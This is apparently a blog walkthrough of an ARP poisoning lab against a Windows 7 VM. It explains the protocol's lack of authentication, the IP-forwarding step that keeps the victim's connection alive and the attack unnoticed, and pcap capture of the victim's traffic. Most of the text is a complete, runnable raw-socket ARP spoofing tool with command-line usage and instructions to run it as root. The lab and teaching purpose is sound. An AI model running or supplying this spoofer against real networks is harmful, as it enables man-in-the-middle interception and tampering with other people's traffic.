ARP poisoning exercise using Python's Scapy library, with a Windows 7 VM as the target.
In this post I will show how I poisoned the target's ARP cache with a Scapy script and captured its traffic to the gateway.
While reading one of my favorite books, Black Hat Python (which I strongly recommend for pentesting), I came across an ARP poisoning exploit as one of the chapter topics. I understood the module, so I decided to apply what I had read and do some cooking of my own. But first, a brief introduction to ARP poisoning. ARP (Address Resolution Protocol) is the protocol every IPv4 host on an Ethernet LAN uses to find the MAC address that belongs to an IP address; Windows uses it like everyone else, but it is a network protocol (RFC 826), not a Windows component. ARP has no authentication: most stacks accept an unsolicited ARP reply and overwrite the cached entry with whatever it claims. ARP poisoning (also called ARP spoofing) abuses this by sending forged replies that map the gateway's IP to the attacker's MAC, so the victim hands its outbound traffic to the attacker instead of the real gateway. It is one of the oldest flaws of the protocol and one of the first techniques a pentester should be able to perform with ease, because once your ARP cache is poisoned an attacker on the same LAN can read, and alter, everything you send through the gateway.
Some 2 years ago, when I was just starting to learn my profession, I performed ARP poisoning with Kali Linux's own arpspoof and ettercap. Today I have written my own, following the book's algorithm, and done the spoofing with it.
Walkthrough
I have set up 2 VMs, an attacker and a target. Below are my target's ipconfig details.
Below is my attacker's network information.
Below is the ARP information before the attack. Take a close look at the MAC addresses listed for the attacker's and the target's IPs.
From the above image, note both hosts' IP addresses and MAC addresses, and the default gateway's IP.
Launching the script...
As you can see, the gateway IP and the target IP have been specified. After the script has been running, checking the ARP cache on the target machine's cmd (arp -a) gives the following...
The target's ARP entry for the gateway has been successfully poisoned: it now shows the attacker's MAC address instead of the gateway's. From this point everything the target sends toward the gateway passes through the attacker and can be sniffed. (The attacker must have IP forwarding enabled, e.g. sysctl -w net.ipv4.ip_forward=1 on Kali, otherwise the target loses its connection to the gateway and the poisoning is noticed immediately.) Accordingly, a pcap file has been produced (as the program is designed to do) in the same directory as the Python script.
We then open the pcap file, and below is the result: the traffic between the target and the gateway has been captured.
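To make the poisoning step concrete, here is an added, stand-alone example; it is not the post's script and not the Black Hat Python code. It builds the same pair of forged ARP replies the post's script sends (gateway entry poisoned at the target, target entry poisoned at the gateway), plus the truthful frames needed to restore both caches when you stop. It uses only the Python standard library (struct for the frame layout and a raw AF_PACKET socket on Linux) instead of Scapy, so the exact bytes Scapy's Ether()/ARP() layers would put on the wire are visible. The interface name, IPs and MACs are assumed lab values, not the ones from the post's screenshots.

```python
"""Hand-built ARP poisoning frames: an added example, not the post's Scapy script.

Lab addresses below are assumed placeholders, not those in the post's screenshots:
  attacker 192.168.56.10 / 08:00:27:aa:aa:aa
  target   192.168.56.20 / 08:00:27:bb:bb:bb
  gateway  192.168.56.1  / 08:00:27:cc:cc:cc
"""
import socket
import struct
import sys
import time

ETH_P_ARP = 0x0806   # EtherType for ARP
ARP_REPLY = 2        # ARP opcode "is-at"
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac: str) -> bytes:
    """'08:00:27:aa:aa:aa' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def arp_frame(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac=None):
    """Ethernet II header + RFC 826 ARP body (42 bytes).

    The Ethernet destination defaults to target_mac, i.e. a unicast reply to
    the victim; the ARP sender fields are what the victim writes into its cache.
    """
    eth = struct.pack("!6s6sH", mac_bytes(dst_mac or target_mac),
                      mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1,        # hardware type: Ethernet
        0x0800,   # protocol type: IPv4
        6, 4,     # hardware / protocol address lengths
        op,
        mac_bytes(sender_mac), socket.inet_aton(sender_ip),
        mac_bytes(target_mac), socket.inet_aton(target_ip),
    )
    return eth + arp


def poison_frames(attacker_mac, target_ip, target_mac, gateway_ip, gateway_mac):
    """The two unsolicited replies that put the attacker in the middle: the target
    learns 'gateway_ip is-at attacker_mac', the gateway learns 'target_ip is-at attacker_mac'."""
    to_target = arp_frame(ARP_REPLY, attacker_mac, gateway_ip, target_mac, target_ip)
    to_gateway = arp_frame(ARP_REPLY, attacker_mac, target_ip, gateway_mac, gateway_ip)
    return to_target, to_gateway


def restore_frames(target_ip, target_mac, gateway_ip, gateway_mac):
    """Truthful replies, broadcast, so both caches return to the real MACs when we stop."""
    to_target = arp_frame(ARP_REPLY, gateway_mac, gateway_ip, target_mac, target_ip, dst_mac=BROADCAST)
    to_gateway = arp_frame(ARP_REPLY, target_mac, target_ip, gateway_mac, gateway_ip, dst_mac=BROADCAST)
    return to_target, to_gateway


def parse_arp(frame):
    """Decode (op, sender_mac, sender_ip, target_mac, target_ip); doubles as a sanity check on our own frames."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    op, smac, sip, tmac, tip = struct.unpack("!H6s4s6s4s", frame[20:42])
    return op, mac_str(smac), socket.inet_ntoa(sip), mac_str(tmac), socket.inet_ntoa(tip)


def run(iface, attacker_mac, target_ip, target_mac, gateway_ip, gateway_mac, interval=2.0):
    """Re-send the poison pair every `interval` seconds (cache entries age out
    otherwise) and restore on Ctrl-C. Linux + root only (AF_PACKET raw socket)."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    sock.bind((iface, 0))
    to_target, to_gateway = poison_frames(attacker_mac, target_ip, target_mac, gateway_ip, gateway_mac)
    try:
        while True:
            sock.send(to_target)
            sock.send(to_gateway)
            time.sleep(interval)
    except KeyboardInterrupt:
        pass
    finally:
        for frame in restore_frames(target_ip, target_mac, gateway_ip, gateway_mac):
            for _ in range(3):   # ARP is unreliable; repeat so a lost frame does not leave a stale cache
                sock.send(frame)
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) != 7:
        sys.exit("usage: arp_poison.py IFACE ATTACKER_MAC TARGET_IP TARGET_MAC GATEWAY_IP GATEWAY_MAC")
    run(*sys.argv[1:])
```

Run it as root on the attacker VM, after enabling IP forwarding, with the interface name and the six addresses from your own lab as arguments; capture the relayed traffic separately (tcpdump, or Scapy's sniff() with wrpcap() as the post's script does). Ctrl-C sends the restore frames so the target's arp -a shows the real gateway MAC again instead of leaving the victim cut off.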
=)